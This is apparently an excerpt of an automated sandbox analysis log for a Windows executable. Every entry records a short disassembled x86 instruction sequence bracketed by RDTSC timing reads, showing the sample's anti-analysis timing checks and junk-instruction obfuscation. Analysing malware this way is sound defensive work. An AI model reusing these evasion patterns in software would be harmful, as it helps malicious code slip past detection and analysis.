                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E64E second address: 57E661 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E661 second address: 57E69A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F8480E31399h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8480E3138Fh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E69A second address: 57E6A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E6A3 second address: 57E6B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E6B4 second address: 57E6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E74E second address: 3A1BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 add dword ptr [esp], 70CD3A43h 0x0000000c js 00007F8480E31399h 0x00000012 push dword ptr [ebp+122D019Dh] 0x00000018 pushad 0x00000019 mov cx, 2F50h 0x0000001d call 00007F8480E31393h 0x00000022 jmp 00007F8480E3138Ch 0x00000027 pop ecx 0x00000028 popad 0x00000029 call dword ptr [ebp+122D19B7h] 0x0000002f pushad 0x00000030 cld 0x00000031 xor eax, eax 0x00000033 pushad 0x00000034 mov eax, 586B7E9Bh 0x00000039 mov ebx, dword ptr [ebp+122D2AF3h] 0x0000003f popad 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 sub dword ptr [ebp+122D275Ch], eax 0x0000004a mov dword ptr [ebp+122D2A63h], eax 0x00000050 mov dword ptr [ebp+122D275Ch], edx 0x00000056 mov esi, 0000003Ch 0x0000005b mov dword ptr [ebp+122D275Ch], edx 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 js 00007F8480E3138Ch 0x0000006b mov dword ptr [ebp+122D275Ch], esi 0x00000071 lodsw 0x00000073 mov dword ptr [ebp+122D275Ch], ebx 0x00000079 je 00007F8480E31390h 0x0000007f pushad 0x00000080 push edi 0x00000081 pop edx 0x00000082 jg 00007F8480E31386h 0x00000088 popad 0x00000089 add eax, dword ptr [esp+24h] 0x0000008d add dword ptr [ebp+122D275Ch], edx 0x00000093 mov ebx, dword ptr [esp+24h] 0x00000097 jno 00007F8480E3138Dh 0x0000009d nop 0x0000009e push eax 0x0000009f push edx 0x000000a0 pushad 0x000000a1 jmp 00007F8480E3138Ah 0x000000a6 jnc 00007F8480E31386h 0x000000ac popad 0x000000ad rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58508F second address: 585093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 585093 second address: 58509F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8480E31386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5846A9 second address: 5846AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5849AC second address: 5849C7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8480E31386h 0x00000008 jnc 00007F8480E31386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 ja 00007F8480E31386h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5849C7 second address: 5849D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5849D3 second address: 5849D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5849D7 second address: 5849F5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8480C71C04h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 584CA1 second address: 584CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 584CA6 second address: 584CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8480C71BF6h 0x0000000a jg 00007F8480C71BF6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58DA55 second address: 58DA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C515 second address: 58C521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F8480C71BF6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C865 second address: 58C891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8480E31395h 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F8480E3138Bh 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C9FD second address: 58CA1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CA1C second address: 58CA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CA22 second address: 58CA30 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F8480C71BF6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CA30 second address: 58CA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CB61 second address: 58CB90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8480C71C06h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8480C71BFBh 0x00000012 jo 00007F8480C71BF6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CE33 second address: 58CE7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8480E31386h 0x00000009 jmp 00007F8480E31396h 0x0000000e popad 0x0000000f push edi 0x00000010 push edi 0x00000011 pop edi 0x00000012 jnc 00007F8480E31386h 0x00000018 pop edi 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 pop eax 0x00000021 jmp 00007F8480E31392h 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CFC9 second address: 58CFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jbe 00007F8480C71BFAh 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 jns 00007F8480C71C06h 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CFFC second address: 58D000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D000 second address: 58D006 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AC23 second address: 53AC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AC2B second address: 53AC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8480C71BF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C22F second address: 58C253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8480E31386h 0x0000000a jmp 00007F8480E31396h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C253 second address: 58C25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597A58 second address: 597A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jo 00007F8480E31386h 0x0000000b jmp 00007F8480E3138Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596CE9 second address: 596D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 jmp 00007F8480C71BFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596D04 second address: 596D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596E6E second address: 596E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596E74 second address: 596EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F8480E31392h 0x0000000f jmp 00007F8480E31391h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596EA3 second address: 596EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596EA9 second address: 596EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596EAE second address: 596EE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C01h 0x00000007 jmp 00007F8480C71BFBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F8480C71C05h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596417 second address: 59641E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59641E second address: 596429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597362 second address: 597380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8480E31386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8480E31390h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597380 second address: 5973A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8480C71C05h 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55EE01 second address: 3A1BB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480E3138Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, ebx 0x0000000f push dword ptr [ebp+122D019Dh] 0x00000015 jmp 00007F8480E31391h 0x0000001a and ecx, 7F77EEB4h 0x00000020 call dword ptr [ebp+122D19B7h] 0x00000026 pushad 0x00000027 cld 0x00000028 xor eax, eax 0x0000002a pushad 0x0000002b mov eax, 586B7E9Bh 0x00000030 mov ebx, dword ptr [ebp+122D2AF3h] 0x00000036 popad 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b sub dword ptr [ebp+122D275Ch], eax 0x00000041 mov dword ptr [ebp+122D2A63h], eax 0x00000047 mov dword ptr [ebp+122D275Ch], edx 0x0000004d mov esi, 0000003Ch 0x00000052 mov dword ptr [ebp+122D275Ch], edx 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c js 00007F8480E3138Ch 0x00000062 mov dword ptr [ebp+122D275Ch], esi 0x00000068 lodsw 0x0000006a mov dword ptr [ebp+122D275Ch], ebx 0x00000070 je 00007F8480E31390h 0x00000076 pushad 0x00000077 push edi 0x00000078 pop edx 0x00000079 jg 00007F8480E31386h 0x0000007f popad 0x00000080 add eax, dword ptr [esp+24h] 0x00000084 add dword ptr [ebp+122D275Ch], edx 0x0000008a mov ebx, dword ptr [esp+24h] 0x0000008e jno 00007F8480E3138Dh 0x00000094 nop 0x00000095 push eax 0x00000096 push edx 0x00000097 pushad 0x00000098 jmp 00007F8480E3138Ah 0x0000009d jnc 00007F8480E31386h 0x000000a3 popad 0x000000a4 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55EFBA second address: 55EFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jl 00007F8480C71C0Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55EFCD second address: 55EFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55EFD1 second address: 55F02E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F8480C71C09h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F8480C71C00h 0x00000019 pop eax 0x0000001a movsx ecx, cx 0x0000001d call 00007F8480C71BF9h 0x00000022 pushad 0x00000023 jc 00007F8480C71BFCh 0x00000029 jg 00007F8480C71BF6h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F02E second address: 55F047 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8480E3138Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F047 second address: 55F076 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F8480C71BF8h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jno 00007F8480C71C04h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F076 second address: 55F07C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F07C second address: 55F086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8480C71BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F1D1 second address: 55F1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480E3138Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F1DF second address: 55F1EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 cmc 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F1EF second address: 55F1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F1F3 second address: 55F201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F8480C71BF6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F5E0 second address: 55F5EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F5EA second address: 55F5FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007F8480C71BF8h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FA2E second address: 55FA6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F8480E31388h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 push 0000001Eh 0x00000027 add dword ptr [ebp+122D28A4h], esi 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jns 00007F8480E3138Ch 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FA6E second address: 55FA7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480C71BFCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FCEC second address: 55FD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push ecx 0x0000000e jmp 00007F8480E3138Ch 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FD0B second address: 55FD18 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FD18 second address: 55FD2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FD8B second address: 55FD91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FD91 second address: 55FD96 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55FD96 second address: 53AC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F8480C71C02h 0x0000000d nop 0x0000000e jc 00007F8480C71C01h 0x00000014 jnp 00007F8480C71BFBh 0x0000001a lea eax, dword ptr [ebp+124905E3h] 0x00000020 and edi, dword ptr [ebp+122D28DBh] 0x00000026 push eax 0x00000027 jo 00007F8480C71C0Ah 0x0000002d jmp 00007F8480C71C04h 0x00000032 mov dword ptr [esp], eax 0x00000035 mov dword ptr [ebp+122D3A51h], ecx 0x0000003b lea eax, dword ptr [ebp+1249059Fh] 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007F8480C71BF8h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b push eax 0x0000005c push edi 0x0000005d pushad 0x0000005e pushad 0x0000005f popad 0x00000060 jmp 00007F8480C71BFCh 0x00000065 popad 0x00000066 pop edi 0x00000067 mov dword ptr [esp], eax 0x0000006a mov dx, 9A3Eh 0x0000006e call dword ptr [ebp+122DB809h] 0x00000074 pushad 0x00000075 push edx 0x00000076 push eax 0x00000077 pop eax 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B626 second address: 59B62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B77A second address: 59B780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B8C5 second address: 59B8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B8C9 second address: 59B8D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BB54 second address: 59BB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BB62 second address: 59BB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BB66 second address: 59BB6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BB6C second address: 59BB73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BB73 second address: 59BB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8480E31386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD10 second address: 59BD23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD23 second address: 59BD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
